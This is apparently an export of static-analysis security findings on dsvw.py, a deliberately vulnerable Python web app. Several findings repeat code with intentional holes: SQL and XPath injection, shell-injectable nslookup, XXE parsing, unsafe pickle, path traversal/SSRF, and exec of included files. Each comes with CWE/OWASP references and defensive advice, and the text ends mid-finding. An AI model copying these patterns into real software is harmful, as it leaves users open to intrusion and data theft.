cwe
+
Line affected
L41
Effort
15 min
Introduced
5 months ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 35 more lines
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(
lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
Disable access to external entities in XML parsing.

                elif "name" in params:
                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))

                        Intentionality
Not complete
Disable access to external entities in XML parsing.

XML parsers should not be vulnerable to XXE attacks python:S2755
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L41
Effort
15 min
Introduced
5 months ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A5 - Security Misconfiguration
OWASP - Top 10 2017 Category A4 - XML External Entities (XXE)
CWE - CWE-611 - Information Exposure Through XML External Entity Reference
CWE - CWE-827 - Improper Control of Document Type Definition
STIG Viewer - Application Security and Development: V-222608 - The application must not be vulnerable to XML-oriented attacks.

________________________________________________________________________________________
FINDING_7

Change this code to not construct this XPath expression from user-controlled data.

XPath expressions should not be vulnerable to injection attacks pythonsecurity:S2091
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L43
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
                elif "name" in params:
                    found = 
15
lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(
14
".//user[name/text()='%s']" % 
13
params["name"])
Change this code to not construct this XPath expression from user-controlled data.

                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:


Change this code to not construct this XPath expression from user-controlled data.

XPath expressions should not be vulnerable to injection attacks pythonsecurity:S2091
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L43
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
CWE - CWE-20 - Improper Input Validation
CWE - CWE-643 - Improper Neutralization of Data within XPath Expressions
STIG Viewer - Application Security and Development: V-222608 - The application must not be vulnerable to XML-oriented attacks.
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.

________________________________________________________________________________________
FINDING_8

Change this code to not set loop bounds directly from user-controlled data.

Loop boundaries should not be vulnerable to injection attacks pythonsecurity:S6680
Software qualities impacted:
Security


4
High
Open
Not assigned
Vulnerability
Critical
Tags
cwe
+
Line affected
L46
Effort
5 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
                elif "name" in params:
                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in 
14
range(int(
13
params["size"])))
Change this code to not set loop bounds directly from user-controlled data.

                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:


Show 44 more lines

Change this code to not set loop bounds directly from user-controlled data.

Loop boundaries should not be vulnerable to injection attacks pythonsecurity:S6680
Software qualities impacted:
Security


4
High
Open
Not assigned
Vulnerability
Critical
Tags
cwe
+
Line affected
L46
Effort
5 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
CWE - CWE-606 - Unchecked Input for Loop Condition
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

________________________________________________________________________________________
FINDING_9

Change this code to not allocate memory based on user-controlled size.

Memory allocations should not be vulnerable to Denial of Service attacks pythonsecurity:S6639
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L46
Effort
5 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
                elif "name" in params:
                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join(
15
"#" * int(
14
params["size"]) for _ in range(int(
13
params["size"])))
Change this code to not allocate memory based on user-controlled size.

                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:


Show 44 more lines

Change this code to not allocate memory based on user-controlled size.

Memory allocations should not be vulnerable to Denial of Service attacks pythonsecurity:S6639
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L46
Effort
5 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Documentation
OWASP - Denial of Service
archlinux.org - pam_limits - PAM module to limit resources
RedHat - How to set limits for services in RHEL and systemd
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
CWE - CWE-789 - Memory Allocation with Excessive Size Value
STIG Viewer - Application Security and Development: V-222594 - The application must restrict the ability to launch Denial of Service (DoS) attacks against itself or other information systems.
STIG Viewer - Application Security and Development: V-222667 - Protections against DoS attacks must be implemented.
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.

________________________________________________________________________________________

FINDING_10

Change this code to not construct the path from user-controlled data.

I/O function calls should not be vulnerable to path injection attacks pythonsecurity:S2083
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L56
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)


Show 19 more lines
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:
                    backup, sys.stdout, program, envs = sys.stdout, io.StringIO(), (
14
open(
13
params["include"], "rb") if not "://" in params["include"] else urllib.request.urlopen(params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
Change this code to not construct the path from user-controlled data.

                    exec(program, envs)
                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")


Show 34 more lines


Change this code to not construct the path from user-controlled data.

I/O function calls should not be vulnerable to path injection attacks pythonsecurity:S2083
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L56
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A1 - Broken Access Control
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
OWASP - Top 10 2017 Category A5 - Broken Access Control
CWE - CWE-20 - Improper Input Validation
CWE - CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.


________________________________________________________________________________________

FINDING_11

Change this code to not construct the URL from user-controlled data.

Server-side requests should not be vulnerable to forging attacks pythonsecurity:S5144
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L56
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)


Show 19 more lines
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:
                    backup, sys.stdout, program, envs = sys.stdout, io.StringIO(), (open(params["include"], "rb") if not "://" in params["include"] else 
14
urllib.request.urlopen(
13
params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
Change this code to not construct the URL from user-controlled data.

                    exec(program, envs)
                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")


Show 34 more lines


Intentionality
Not complete
Change this code to not construct the URL from user-controlled data.

Server-side requests should not be vulnerable to forging attacks pythonsecurity:S5144
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L56
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A10 - Server-Side Request Forgery (SSRF)
OWASP - Top 10 2017 Category A5 - Broken Access Control
CWE - CWE-20 - Improper Input Validation
CWE - CWE-918 - Server-Side Request Forgery (SSRF)
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.


________________________________________________________________________________________
FINDING_12  

Change this code to not dynamically execute code influenced by user-controlled data.

Dynamic code execution should not be vulnerable to injection attacks pythonsecurity:S5334
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L57
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)


Show 19 more lines
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:
                    
16
backup, sys.stdout, program, envs = sys.stdout, io.StringIO(), 
15
(open(params["include"], "rb") if not "://" in params["include"] else 
14
urllib.request.urlopen(
13
